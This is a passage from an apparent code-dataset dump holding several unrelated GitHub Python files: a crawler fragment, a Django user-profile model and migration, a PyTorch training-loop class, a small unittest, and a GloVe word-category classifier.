data7[1:6]\n data_in_single = data7[6:-1]\n else:\n raise ValueError(\"unexpected number of detail tables: {}\".format(len(data7)))\n\n\n for dat in data_in_td:\n data = dat.find_all(\"td\")\n for tdata in data:\n data_to_get.append(tdata.get_text())\n for dat in data_in_single:\n daa = dat.find_all(\"i\")\n for da in daa:\n data_to_get.append(da.get_text()[0:1000])\n data_left = data_to_get[::2]\n data_right = data_to_get[1::2]\n\n\n\n return data_to_send, data_left, data_right\n\n\n# return data_to_send\n\n\n\n","repo_name":"Sudhanva07/Crawler","sub_path":"getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16110155978","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\nclass Profile(models.Model):\n\tACCESS_OPTIONS = (\n\t\t('Admin', 'Admin'),\n\t\t('Client', 'Client'),\n\t\t('Customer', 'Customer'),\n\t\t)\n\tuser = models.OneToOneField(User, on_delete=models.CASCADE)\n\taccess = models.CharField(max_length=10, choices=ACCESS_OPTIONS, null=False)\n\t\n\tdef __str__(self):\n\t\treturn 
self.user.username\n","repo_name":"kriti21/Smart-India-Hackathon-2018","sub_path":"Portal_FilmShooting/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40501639515","text":"\"\"\"\nClass for a generic model trainer.\n\"\"\"\nimport torch\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nfrom blip.dataset.blip import BlipDataset\nfrom blip.utils.logger import Logger\nfrom blip.losses import LossHandler\nfrom blip.models import ModelChecker\nfrom blip.metrics import MetricHandler\nfrom blip.optimizers import Optimizer\nfrom blip.utils.timing import Timers\nfrom blip.utils.memory import MemoryTrackers\nfrom blip.utils.callbacks import CallbackHandler\nfrom blip.utils.callbacks import TimingCallback, MemoryTrackerCallback\nimport blip.utils.utils as utils\n\nclass Trainer:\n \"\"\"\n This class is an attempt to reduce code rewriting by putting together\n a set of functions that do everything that we could need with \n respect to training. There are a few objects which must be passed\n to the trainer, which include:\n (a) model - an object which inherits from nn.Module\n (b) criterion - an object which has a defined function called \"loss\"\n (c) optimizer - some choice of optimizer, e.g. Adam\n (d) metrics - (optional) an object which has certain defined functions\n (e) callbacks - (optional) an object which has certain defined functions \n \"\"\"\n def __init__(self,\n model,\n criterion: LossHandler=None,\n optimizer: Optimizer=None,\n metrics: MetricHandler=None,\n callbacks: CallbackHandler=None,\n meta: dict=None, # avoid a mutable default argument\n seed: int=0,\n ): \n self.name = model.name + \"_trainer\"\n self.meta = meta if meta is not None else {}\n if \"device\" in self.meta:\n self.device = self.meta['device']\n else:\n self.device = 'cpu'\n # Create the logger once, with verbosity taken from the metadata\n if self.meta.get('verbose', False):\n self.logger = Logger(self.name, output=\"both\", file_mode=\"w\")\n else:\n self.logger = Logger(self.name, level='warning', file_mode=\"w\")\n self.logger.info(\"constructing model trainer.\")\n # Check for compatibility with parameters\n\n # define directories\n self.predictions_dir = f'{self.meta[\"local_scratch\"]}/predictions/{model.name}/'\n self.manifold_dir = f'{self.meta[\"local_scratch\"]}/plots/{model.name}/manifold/'\n self.features_dir = f'{self.meta[\"local_scratch\"]}/plots/{model.name}/features/'\n self.timing_dir = f'{self.meta[\"local_scratch\"]}/plots/{model.name}/timing/'\n self.memory_dir = f'{self.meta[\"local_scratch\"]}/plots/{model.name}/memory/'\n\n # create directories\n if not os.path.isdir(self.predictions_dir):\n self.logger.info(f\"creating predictions directory '{self.predictions_dir}'\")\n os.makedirs(self.predictions_dir)\n if not os.path.isdir(self.manifold_dir):\n self.logger.info(f\"creating manifold directory '{self.manifold_dir}'\")\n os.makedirs(self.manifold_dir)\n if not os.path.isdir(self.features_dir):\n self.logger.info(f\"creating features directory '{self.features_dir}'\")\n os.makedirs(self.features_dir)\n if not os.path.isdir(self.timing_dir):\n self.logger.info(f\"creating timing directory '{self.timing_dir}'\")\n os.makedirs(self.timing_dir)\n if not os.path.isdir(self.memory_dir):\n self.logger.info(f\"creating memory directory '{self.memory_dir}'\")\n os.makedirs(self.memory_dir)\n\n # check for devices\n self.gpu = self.meta['gpu']\n self.seed = seed\n \n # assign objects\n self.model = model\n self.optimizer = 
optimizer\n self.criterion = criterion\n self.metrics = metrics\n if callbacks is None:\n # add generic callbacks\n self.callbacks = CallbackHandler(\n name=\"default\"\n )\n else:\n self.callbacks = callbacks\n self.model_checker = ModelChecker(\"model_checker\")\n\n # send other objects to the device\n self.model.set_device(self.device)\n self.criterion.set_device(self.device)\n if self.metrics is not None:\n self.metrics.set_device(self.device)\n\n # add timing info\n self.timers = Timers(gpu=self.gpu)\n self.timer_callback = TimingCallback(\n output_dir=self.timing_dir,\n timers=self.timers\n )\n self.callbacks.add_callback(self.timer_callback)\n\n # add memory info\n self.memory_trackers = MemoryTrackers(gpu=self.gpu)\n self.memory_callback = MemoryTrackerCallback(\n output_dir=self.memory_dir,\n memory_trackers=self.memory_trackers\n )\n self.callbacks.add_callback(self.memory_callback)\n\n # run consistency check\n self.logger.info(\"running consistency check...\")\n self.shapes = self.model_checker.run_consistency_check(\n dataset_loader=self.meta['loader'],\n model=self.model,\n criterion=self.criterion,\n metrics=self.metrics\n )\n\n def train(self,\n epochs: int=100, # number of epochs to train\n checkpoint: int=10, # epochs between weight saving\n progress_bar: str='all', # progress bar from tqdm\n rewrite_bar: bool=False, # whether to leave the bars after each epoch\n save_predictions: bool=True, # whether to save network outputs for all events to original file\n no_timing: bool=False, # whether to keep the bare minimum timing info as a callback\n ):\n \"\"\"\n Main training loop. First, we see if the user wants to omit timing information.\n \"\"\"\n if (self.model.device != self.device):\n self.logger.error(f\"device: '{self.device}' and model device: '{self.model.device}' are different!\")\n if (self.criterion.device != self.device):\n self.logger.error(f\"device: '{self.device}' and criterion device: '{self.criterion.device}' are different!\")\n \n self.model.save_model(flag='init')\n # setting values in callbacks\n self.callbacks.set_device(self.device)\n self.callbacks.set_training_info(\n epochs,\n self.meta['loader'].num_train_batches,\n self.meta['loader'].num_validation_batches,\n self.meta['loader'].num_test_batches\n )\n # Training\n self.logger.info(f\"training dataset '{self.meta['dataset'].name}' for {epochs} epochs.\")\n if no_timing:\n # TODO: Need to fix this so that memory and timing callbacks aren't called.\n self.__train_no_timing(\n epochs,\n checkpoint,\n progress_bar,\n rewrite_bar,\n save_predictions\n )\n else:\n self.__train_with_timing(\n epochs,\n checkpoint,\n progress_bar,\n rewrite_bar,\n save_predictions\n )\n\n def __train_with_timing(self,\n epochs: int=100, # number of epochs to train\n checkpoint: int=10, # epochs between weight saving\n progress_bar: str='all', # progress bar from tqdm\n rewrite_bar: bool=False, # whether to leave the bars after each epoch\n save_predictions: bool=True, # whether to save network outputs for all events to original file\n ):\n \"\"\"\n Training usually consists of the following steps:\n (1) Zero-out training/validation/testing losses and metrics\n (2) Loop for N epochs:\n (a) Grab the current batch of (training/validation) data.\n (b) Run the data through the model and calculate losses/metrics.\n (c) Backpropagate the loss (training)\n (3) Evaluate the trained model on testing data.\n \"\"\"\n # iterate over epochs\n for epoch in range(epochs):\n \"\"\"\n Training stage.\n Setup the progress bar for the training 
loop.\n \"\"\"\n if (progress_bar == 'all' or progress_bar == 'train'):\n training_loop = tqdm(\n enumerate(self.meta['loader'].train_loader, 0), \n total=len(self.meta['loader'].train_loader), \n leave=rewrite_bar,\n position=0,\n colour='green'\n )\n else:\n training_loop = enumerate(self.meta['loader'].train_loader, 0)\n\n # make sure to set model to train() during training!\n self.model.train()\n \"\"\" \n Setup timing/memory information for epoch.\n \"\"\"\n self.timers.timers['epoch_training'].start()\n self.memory_trackers.memory_trackers['epoch_training'].start()\n self.timers.timers['training_data'].start()\n self.memory_trackers.memory_trackers['training_data'].start()\n for ii, data in training_loop:\n self.memory_trackers.memory_trackers['training_data'].end()\n self.timers.timers['training_data'].end()\n # zero the parameter gradients\n \"\"\"\n There are choices here, either one can do:\n model.zero_grad() or\n optimizer.zero_grad() or\n for param in model.parameters(): <== optimal choice\n param.grad = None\n \"\"\"\n self.timers.timers['training_zero_grad'].start()\n self.memory_trackers.memory_trackers['training_zero_grad'].start()\n for param in self.model.parameters():\n param.grad = None\n self.memory_trackers.memory_trackers['training_zero_grad'].end()\n self.timers.timers['training_zero_grad'].end()\n # get the network output\n \"\"\"\n The forward call takes in the entire data\n stream, which could have multiple inputs needed.\n It's up to the model to determine what to do with it.\n The forward call of the model could send out\n multiple output tensors, depending on the application\n (such as in an AE where the latent space values are\n important). It's up to the loss function to know what to expect.\n \"\"\"\n self.timers.timers['training_forward'].start()\n self.memory_trackers.memory_trackers['training_forward'].start()\n outputs = self.model(data)\n self.memory_trackers.memory_trackers['training_forward'].end()\n self.timers.timers['training_forward'].end()\n\n # compute loss\n self.timers.timers['training_loss'].start()\n self.memory_trackers.memory_trackers['training_loss'].start()\n loss = self.criterion.loss(outputs, data)\n self.memory_trackers.memory_trackers['training_loss'].end()\n self.timers.timers['training_loss'].end()\n\n # backprop\n self.timers.timers['training_loss_backward'].start()\n self.memory_trackers.memory_trackers['training_loss_backward'].start()\n loss.backward()\n self.memory_trackers.memory_trackers['training_loss_backward'].end()\n self.timers.timers['training_loss_backward'].end()\n\n # record backprop timing\n self.timers.timers['training_backprop'].start()\n self.memory_trackers.memory_trackers['training_backprop'].start()\n self.optimizer.step()\n self.memory_trackers.memory_trackers['training_backprop'].end()\n self.timers.timers['training_backprop'].end()\n\n # update progress bar\n self.timers.timers['training_progress'].start()\n self.memory_trackers.memory_trackers['training_progress'].start()\n if (progress_bar == 'all' or progress_bar == 'train'):\n training_loop.set_description(f\"Training: Epoch [{epoch+1}/{epochs}]\")\n training_loop.set_postfix_str(f\"loss={loss.item():.2e}\")\n self.memory_trackers.memory_trackers['training_progress'].end()\n self.timers.timers['training_progress'].end()\n \n self.timers.timers['training_data'].start()\n self.memory_trackers.memory_trackers['training_data'].start()\n # update timing info\n self.memory_trackers.memory_trackers['epoch_training'].end()\n 
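A minimal generic-PyTorch sketch (independent of this trainer) of the three gradient-clearing options compared in the comment inside the training loop above; assigning None drops the gradient buffers instead of zeroing them, which skips a memset per parameter and matches what zero_grad(set_to_none=True) does in recent PyTorch.

import torch

model = torch.nn.Linear(4, 2)
optimizer = torch.optim.SGD(model.parameters(), lr=0.1)

model.zero_grad()      # option 1: zero the existing .grad tensors
optimizer.zero_grad()  # option 2: the same, via the optimizer
for param in model.parameters():
    param.grad = None  # option 3: drop the buffers entirely (cheapest)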
self.timers.timers['epoch_training'].end()\n self.model.eval()\n with torch.no_grad():\n \"\"\"\n Run through a metric loop if there are any metrics\n defined.\n \"\"\"\n if self.metrics != None:\n if (progress_bar == 'all' or progress_bar == 'train'):\n metrics_training_loop = tqdm(\n enumerate(self.meta['loader'].train_loader, 0), \n total=len(self.meta['loader'].train_loader), \n leave=rewrite_bar,\n position=0,\n colour='green'\n )\n else:\n metrics_training_loop = enumerate(self.meta['loader'].train_loader, 0)\n self.metrics.reset_batch()\n for ii, data in metrics_training_loop:\n # update metrics\n self.timers.timers['training_metrics'].start()\n self.memory_trackers.memory_trackers['training_metrics'].start()\n outputs = self.model(data)\n self.metrics.update(outputs, data, train_type=\"train\")\n self.memory_trackers.memory_trackers['training_metrics'].end()\n self.timers.timers['training_metrics'].end()\n if (progress_bar == 'all' or progress_bar == 'train'):\n metrics_training_loop.set_description(f\"Training Metrics: Epoch [{epoch+1}/{epochs}]\")\n \n # evaluate callbacks\n self.timers.timers['training_callbacks'].start()\n self.memory_trackers.memory_trackers['training_callbacks'].start()\n self.callbacks.evaluate_epoch(train_type='train')\n self.memory_trackers.memory_trackers['training_callbacks'].end()\n self.timers.timers['training_callbacks'].end()\n\n \"\"\"\n Validation stage.\n Setup the progress bar for the validation loop.\n \"\"\"\n if (progress_bar == 'all' or progress_bar == 'validation'):\n validation_loop = tqdm(\n enumerate(self.meta['loader'].validation_loader, 0), \n total=len(self.meta['loader'].validation_loader), \n leave=rewrite_bar,\n position=0,\n colour='blue'\n )\n else:\n validation_loop = enumerate(self.meta['loader'].validation_loader, 0)\n # make sure to set model to eval() during validation!\n self.model.eval()\n with torch.no_grad():\n \"\"\"\n Setup timing information for epoch.\n \"\"\"\n self.timers.timers['epoch_validation'].start()\n self.memory_trackers.memory_trackers['epoch_validation'].start()\n self.timers.timers['validation_data'].start()\n self.memory_trackers.memory_trackers['validation_data'].start()\n for ii, data in validation_loop:\n self.memory_trackers.memory_trackers['validation_data'].end()\n self.timers.timers['validation_data'].end()\n # get the network output\n self.timers.timers['validation_forward'].start()\n self.memory_trackers.memory_trackers['validation_forward'].start()\n outputs = self.model(data)\n self.memory_trackers.memory_trackers['validation_forward'].end()\n self.timers.timers['validation_forward'].end()\n\n # compute loss\n self.timers.timers['validation_loss'].start()\n self.memory_trackers.memory_trackers['validation_loss'].start()\n loss = self.criterion.loss(outputs, data)\n self.memory_trackers.memory_trackers['validation_loss'].end()\n self.timers.timers['validation_loss'].end()\n\n # update progress bar\n self.timers.timers['validation_progress'].start()\n self.memory_trackers.memory_trackers['validation_progress'].start()\n if (progress_bar == 'all' or progress_bar == 'validation'):\n validation_loop.set_description(f\"Validation: Epoch [{epoch+1}/{epochs}]\")\n validation_loop.set_postfix_str(f\"loss={loss.item():.2e}\")\n self.memory_trackers.memory_trackers['validation_progress'].end()\n self.timers.timers['validation_progress'].end()\n\n self.timers.timers['validation_data'].start()\n self.memory_trackers.memory_trackers['validation_data'].start()\n # update timing info\n 
self.memory_trackers.memory_trackers['epoch_validation'].end()\n self.timers.timers['epoch_validation'].end()\n \"\"\"\n Run through a metric loop if there are any metrics\n defined.\n \"\"\"\n if self.metrics != None:\n if (progress_bar == 'all' or progress_bar == 'validation'):\n metrics_validation_loop = tqdm(\n enumerate(self.meta['loader'].validation_loader, 0), \n total=len(self.meta['loader'].validation_loader), \n leave=rewrite_bar,\n position=0,\n colour='blue'\n )\n else:\n metrics_validation_loop = enumerate(self.meta['loader'].validation_loader, 0)\n self.metrics.reset_batch()\n for ii, data in metrics_validation_loop:\n # update metrics\n self.timers.timers['validation_metrics'].start()\n self.memory_trackers.memory_trackers['validation_metrics'].start()\n outputs = self.model(data)\n self.metrics.update(outputs, data, train_type=\"validation\")\n self.memory_trackers.memory_trackers['validation_metrics'].end()\n self.timers.timers['validation_metrics'].end()\n if (progress_bar == 'all' or progress_bar == 'validation'):\n metrics_validation_loop.set_description(f\"Validation Metrics: Epoch [{epoch+1}/{epochs}]\")\n\n # evaluate callbacks\n self.timers.timers['validation_callbacks'].start()\n self.memory_trackers.memory_trackers['validation_callbacks'].start()\n self.callbacks.evaluate_epoch(train_type='validation')\n self.memory_trackers.memory_trackers['validation_callbacks'].end()\n self.timers.timers['validation_callbacks'].end()\n\n # save weights if at checkpoint step\n if epoch % checkpoint == 0:\n if not os.path.exists(f\"{self.meta['local_scratch']}/.checkpoints/\"):\n os.makedirs(f\"{self.meta['local_scratch']}/.checkpoints/\")\n torch.save(\n self.model.state_dict(), \n f\"{self.meta['local_scratch']}/.checkpoints/checkpoint_{epoch}.ckpt\"\n )\n # free up gpu resources\n torch.cuda.empty_cache()\n # evaluate epoch callbacks\n self.callbacks.evaluate_training()\n self.logger.info(f\"training finished.\")\n \"\"\"\n Testing stage.\n Setup the progress bar for the testing loop.\n We do not have timing information for the test\n loop stage, since it is generally quick\n and doesn't need to be optimized for any reason.\n \"\"\"\n if (progress_bar == 'all' or progress_bar == 'test'):\n test_loop = tqdm(\n enumerate(self.meta['loader'].test_loader, 0), \n total=len(self.meta['loader'].test_loader), \n leave=rewrite_bar,\n position=0,\n colour='red'\n )\n else:\n test_loop = enumerate(self.meta['loader'].test_loader, 0)\n # make sure to set model to eval() during validation!\n self.model.eval()\n if self.metrics != None:\n self.metrics.reset_batch()\n with torch.no_grad():\n for ii, data in test_loop:\n # get the network output\n outputs = self.model(data)\n\n # compute loss\n loss = self.criterion.loss(outputs, data)\n\n # update metrics\n if self.metrics != None:\n self.metrics.update(outputs, data, train_type=\"test\")\n\n # update progress bar\n if (progress_bar == 'all' or progress_bar == 'test'):\n test_loop.set_description(f\"Testing: Batch [{ii+1}/{self.meta['loader'].num_test_batches}]\")\n test_loop.set_postfix_str(f\"loss={loss.item():.2e}\")\n\n # evaluate callbacks\n self.callbacks.evaluate_epoch(train_type='test')\n self.callbacks.evaluate_testing()\n # save the final model\n self.model.save_model(flag='trained')\n\n # see if predictions should be saved\n if save_predictions:\n self.logger.info(f\"Running inference to save predictions.\")\n return self.inference(\n dataset_type='all',\n outputs=[output for output in self.shapes[\"output\"].keys()],\n 
progress_bar=progress_bar,\n                rewrite_bar=rewrite_bar,\n                save_predictions=True,\n            )\n        \n    def __train_no_timing(self,\n        epochs: int=100, # number of epochs to train\n        checkpoint: int=10, # epochs in between weight saving\n        progress_bar: str='all', # progress bar from tqdm\n        rewrite_bar: bool=False, # whether to leave the bars after each epoch\n        save_predictions:bool=True, # whether to save network outputs for all events to original file\n    ):\n        \"\"\"\n        No comments here since the code is identical to the __train_with_timing function \n        except for the lack of calls to timers.\n        \"\"\"\n        for epoch in range(epochs):\n            if (progress_bar == 'all' or progress_bar == 'train'):\n                training_loop = tqdm(\n                    enumerate(self.meta['loader'].train_loader, 0), \n                    total=len(self.meta['loader'].train_loader), \n                    leave=rewrite_bar,\n                    position=0,\n                    colour='green'\n                )\n            else:\n                training_loop = enumerate(self.meta['loader'].train_loader, 0)\n            self.model.train()\n            for ii, data in training_loop:\n                for param in self.model.parameters():\n                    param.grad = None\n                outputs = self.model(data)\n                loss = self.criterion.loss(outputs, data)\n                loss.backward()\n                self.optimizer.step()\n                if (progress_bar == 'all' or progress_bar == 'train'):\n                    training_loop.set_description(f\"Training: Epoch [{epoch+1}/{epochs}]\")\n                    training_loop.set_postfix_str(f\"loss={loss.item():.2e}\")\n            if self.metrics is not None:\n                if (progress_bar == 'all' or progress_bar == 'train'):\n                    metrics_training_loop = tqdm(\n                        enumerate(self.meta['loader'].train_loader, 0), \n                        total=len(self.meta['loader'].train_loader), \n                        leave=rewrite_bar,\n                        position=0,\n                        colour='green'\n                    )\n                else:\n                    metrics_training_loop = enumerate(self.meta['loader'].train_loader, 0)\n                self.metrics.reset_batch()\n                for ii, data in metrics_training_loop:\n                    outputs = self.model(data)\n                    self.metrics.update(outputs, data, train_type=\"train\")\n                    if (progress_bar == 'all' or progress_bar == 'train'):\n                        metrics_training_loop.set_description(f\"Training Metrics: Epoch [{epoch+1}/{epochs}]\")\n            self.callbacks.evaluate_epoch(train_type='train')\n            if (progress_bar == 'all' or progress_bar == 'validation'):\n                validation_loop = tqdm(\n                    enumerate(self.meta['loader'].validation_loader, 0), \n                    total=len(self.meta['loader'].validation_loader), \n                    leave=rewrite_bar,\n                    position=0,\n                    colour='blue'\n                )\n            else:\n                validation_loop = enumerate(self.meta['loader'].validation_loader, 0)\n            self.model.eval()\n            with torch.no_grad():\n                for ii, data in validation_loop:\n                    outputs = self.model(data)\n                    loss = self.criterion.loss(outputs, data)\n                    if (progress_bar == 'all' or progress_bar == 'validation'):\n                        validation_loop.set_description(f\"Validation: Epoch [{epoch+1}/{epochs}]\")\n                        validation_loop.set_postfix_str(f\"loss={loss.item():.2e}\")\n            if self.metrics is not None:\n                if (progress_bar == 'all' or progress_bar == 'validation'):\n                    metrics_validation_loop = tqdm(\n                        enumerate(self.meta['loader'].validation_loader, 0), \n                        total=len(self.meta['loader'].validation_loader), \n                        leave=rewrite_bar,\n                        position=0,\n                        colour='blue'\n                    )\n                else:\n                    metrics_validation_loop = enumerate(self.meta['loader'].validation_loader, 0)\n                self.metrics.reset_batch()\n                for ii, data in metrics_validation_loop:\n                    outputs = self.model(data)\n                    self.metrics.update(outputs, data, train_type=\"validation\")\n                    if (progress_bar == 'all' or progress_bar == 'validation'):\n                        metrics_validation_loop.set_description(f\"Validation Metrics: Epoch [{epoch+1}/{epochs}]\")\n            self.callbacks.evaluate_epoch(train_type='validation')\n            if epoch % checkpoint == 0:\n                if not 
os.path.exists(f\"{self.meta['local_scratch']}/.checkpoints/\"):\n                    os.makedirs(f\"{self.meta['local_scratch']}/.checkpoints/\")\n                torch.save(\n                    self.model.state_dict(), \n                    f\"{self.meta['local_scratch']}/.checkpoints/checkpoint_{epoch}.ckpt\"\n                )\n        self.callbacks.evaluate_training()\n        self.logger.info(f\"training finished.\")\n        if (progress_bar == 'all' or progress_bar == 'test'):\n            test_loop = tqdm(\n                enumerate(self.meta['loader'].test_loader, 0), \n                total=len(self.meta['loader'].test_loader), \n                leave=rewrite_bar,\n                position=0,\n                colour='red'\n            )\n        else:\n            test_loop = enumerate(self.meta['loader'].test_loader, 0)\n        self.model.eval()\n        # reset metrics once before the test loop; resetting inside the loop\n        # would discard every batch except the last one\n        if self.metrics is not None:\n            self.metrics.reset_batch()\n        with torch.no_grad():\n            for ii, data in test_loop:\n                outputs = self.model(data)\n                loss = self.criterion.loss(outputs, data)\n                if self.metrics is not None:\n                    self.metrics.update(outputs, data, train_type=\"test\")\n                if (progress_bar == 'all' or progress_bar == 'test'):\n                    test_loop.set_description(f\"Testing: Batch [{ii+1}/{self.meta['loader'].num_test_batches}]\")\n                    test_loop.set_postfix_str(f\"loss={loss.item():.2e}\")\n        self.callbacks.evaluate_epoch(train_type='test')\n        self.callbacks.evaluate_testing()\n        self.model.save_model(flag='trained')\n        if save_predictions:\n            self.logger.info(f\"Running inference to save predictions.\")\n            return self.inference(\n                dataset_type='all',\n                outputs=[output for output in self.shapes[\"output\"].keys()],\n                progress_bar=progress_bar,\n                rewrite_bar=rewrite_bar,\n                save_predictions=True,\n            )\n\n    def inference(self,\n        dataset_type: str='all', # which dataset to use for inference\n        layers: list=[], # which forward views to save\n        outputs: list=[], # which outputs to save\n        save_predictions:bool=True, # whether to save the predictions\n        progress_bar: bool=True, # progress bar from tqdm\n        rewrite_bar: bool=True, # whether to leave the bars after each epoch\n    ):\n        \"\"\"\n        Here we just do inference on a particular part\n        of the dataset_loader, either 'train', 'validation',\n        'test' or 'all'.\n        \"\"\"\n        # check that everything is on the same device\n        if (self.model.device != self.device):\n            self.logger.error(f\"device: '{self.device}' and model device: '{self.model.device}' are different!\")\n        if (self.criterion.device != self.device):\n            self.logger.error(f\"device: '{self.device}' and criterion device: '{self.criterion.device}' are different!\")\n\n        # determine loader\n        if dataset_type == 'train':\n            inference_loader = self.meta['loader'].train_loader\n            num_batches = self.meta['loader'].num_training_batches\n            inference_indices = self.meta['loader'].train_indices\n        elif dataset_type == 'validation':\n            inference_loader = self.meta['loader'].validation_loader\n            num_batches = self.meta['loader'].num_validation_batches\n            inference_indices = self.meta['loader'].validation_indices\n        elif dataset_type == 'test':\n            inference_loader = self.meta['loader'].test_loader\n            num_batches = self.meta['loader'].num_test_batches\n            inference_indices = self.meta['loader'].test_indices\n        else:\n            inference_loader = self.meta['loader'].all_loader\n            num_batches = self.meta['loader'].num_all_batches\n            inference_indices = self.meta['loader'].all_indices\n\n        \"\"\"\n        Set up progress bar.\n        \"\"\"\n        if (progress_bar == True):\n            inference_loop = tqdm(\n                enumerate(inference_loader, 0), \n                total=len(list(inference_indices)), \n                leave=rewrite_bar,\n                position=0,\n                colour='magenta'\n            )\n        else:\n            inference_loop = enumerate(inference_loader, 0)\n        \n        # set up array for predictions\n        predictions = {\n            layer: [] \n            for layer in layers\n        }\n        for output in 
outputs:\n predictions[output] = []\n\n self.logger.info(f\"running inference on dataset '{self.meta['dataset'].name}'.\")\n # make sure to set model to eval() during validation!\n self.model.eval()\n with torch.no_grad():\n if self.metrics != None:\n self.metrics.reset_batch()\n for ii, data in inference_loop:\n # get the network output\n model_output = self.model(data)\n for jj, key in enumerate(model_output.keys()):\n if key in predictions.keys():\n predictions[key].append([model_output[key].cpu().numpy()])\n for jj, key in enumerate(layers):\n if key in predictions.keys():\n predictions[key].append([self.model.forward_views[key].cpu().numpy()])\n # compute loss\n if self.criterion != None:\n loss = self.criterion.loss(model_output, data)\n\n # update metrics\n if self.metrics != None:\n self.metrics.update(model_output, data, train_type=\"inference\")\n\n # update progress bar\n if (progress_bar == True):\n inference_loop.set_description(f\"Inference: Batch [{ii+1}/{num_batches}]\")\n inference_loop.set_postfix_str(f\"loss={loss.item():.2e}\")\n for key in predictions.keys():\n predictions[key] = np.vstack(np.array(predictions[key], dtype=object))\n # save predictions if wanted\n if save_predictions:\n self.meta['dataset'].append_dataset_files(\n self.model.name + \"_predictions\",\n predictions,\n np.array(inference_indices, dtype=object)\n )\n self.callbacks.evaluate_inference()\n self.logger.info(f\"returning predictions.\")\n return predictions","repo_name":"Neutron-Calibration-in-DUNE/Blip","sub_path":"blip/trainer/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":33701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40697791630","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('spike', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='DataRecord',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, serialize=False, verbose_name='ID')),\n ('captured_date', models.DateField()),\n ('raw_data', models.CharField(max_length=50000)),\n ('submitted_date', models.DateField()),\n ],\n ),\n ]\n","repo_name":"ITCadre-Projects/fda","sub_path":"spike/migrations/0002_datarecord.py","file_name":"0002_datarecord.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40823344682","text":"import unittest\nfrom tests.unit_test_helper.console_test_helper import *\n\n\nclass TestOutput(unittest.TestCase):\n\n def test(self):\n result = get_script_output(\"lab01/ch01_t04_handling_errors.py\")\n print(result)\n self.assertEqual(\"How do you make a hot dog stand?\\nYou take away its chair!\\n\", result)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"wongcyrus/ite3101_introduction_to_programming","sub_path":"tests/lab01/test_ch01_t04_handling_errors.py","file_name":"test_ch01_t04_handling_errors.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"14657916496","text":"import glove\r\nimport numpy as np\r\ntry:\r\n\tfrom .title_clear_v2 import *\r\nexcept:\r\n\tfrom title_clear_v2 import *\r\nimport functools\r\nfrom nltk.stem import WordNetLemmatizer as lt\r\nCATEGORIES = [\r\n\t\t\t'human animal bird',\r\n\t\t\t'kind soft 
familiar',\r\n\t\t\t'machine robot technical architecture building',\r\n\t\t\t'fantasy adventure explore hunt hunter treasure'\r\n\t\t\t]\r\n'''\r\n'speed dash fast run race jump warp',\r\n'ball roll bounce circle',\r\n'song music classic rhythm sound piano',\r\n'horror zombie blaxploitation'\r\n]\r\n'''\r\nTHRESHOLD = [\r\n\t\t\t0.4,\r\n\t\t\t0.4,\r\n\t\t\t0.4,\r\n\t\t\t0.4\r\n\t\t\t]\r\n'''\r\n0.4,\r\n0.4,\r\n0.4,\r\n0.4\r\n]\r\n'''\r\n#1. type -1 for words that are missing from the dictionary\r\n#2. count of -1s -> length -> keys like -1_2_-1 : stored in a dictionary this way\r\n\r\n\r\ndef generate_category_map(g,cat,th):\r\n\tlst = cat.split()\r\n\tlst=list(map( lambda x : global_map_generate(g,x,th), lst))\r\n\treturn lst\r\ndef global_map_generate(glove_obj,word,th):\r\n\ttry:\r\n\t\twidx1 = glove_obj.dictionary[word]\r\n\texcept:\r\n\t\tprint(\"no word exists as {}\".format(word))\r\n\t\treturn []\r\n\tword_vec = glove_obj.word_vectors[widx1]\r\n\tdst = (np.dot(glove_obj.word_vectors, word_vec) / np.linalg.norm(glove_obj.word_vectors, axis=1) / np.linalg.norm(word_vec))\r\n\tword_ids = np.argsort(-dst) #[3 0 1 2] input = [4,3,2,5]\r\n\treturn [x for x in word_ids if dst[x] >th]\r\n\r\ndef read_glove_file(filename):\r\n\tg = glove.glove.Glove.load(filename)\r\n\r\n\treturn g\r\n\r\ndef classify_word(g,input_word):\r\n\ttype_class = [0 for i in range((len(CATEGORIES)))]\r\n\tinput_word = lt().lemmatize(input_word.lower())\r\n\ttry:\r\n\t\tinput_word_idx = g.dictionary[input_word]\r\n\r\n\t\tfor i in range(len(CATEGORY_MAP)):\r\n\t\t\tmaps = CATEGORY_MAP[i]\r\n\t\t\tfor map_ in maps:\r\n\t\t\t\tif input_word_idx in map_:\r\n\t\t\t\t\ttype_class[i] = 1\r\n\r\n\texcept:\r\n\t\ttype_class[-1] = -1\r\n\t\tprint(\"no word available in dictionary: {}\".format(input_word))\r\n\r\n\treturn type_class\r\ndef similar_is(glove_obj,w1,w2):\r\n\ttry:\r\n\t\twidx1 = glove_obj.dictionary[w1]\r\n\t\twidx2 = glove_obj.dictionary[w2]\r\n\t\treturn similarity_query(glove_obj,glove_obj.word_vectors[widx1],widx2)\r\n\texcept:\r\n\t\treturn False\r\n\r\n\r\n\r\ndef similarity_query(glove_obj, word_vec, category_word_idx):\r\n\tdst = (np.dot(glove_obj.word_vectors, word_vec) / np.linalg.norm(glove_obj.word_vectors, axis=1) / np.linalg.norm(word_vec))\r\n\tif category_word_idx in glove_obj.inverse_dictionary:\r\n\t\treturn dst[category_word_idx]\r\n\telse:\r\n\t\treturn False\r\n#GLOVE_OBJ = read_glove_file('gf')\r\n#CATEGORY_MAP = list(map( lambda x: generate_category_map(GLOVE_OBJ,CATEGORIES[x],THRESHOLD[x]),range(len(CATEGORIES) )))\r\n\r\ndef test_routine():\r\n\tprint(\"No test is 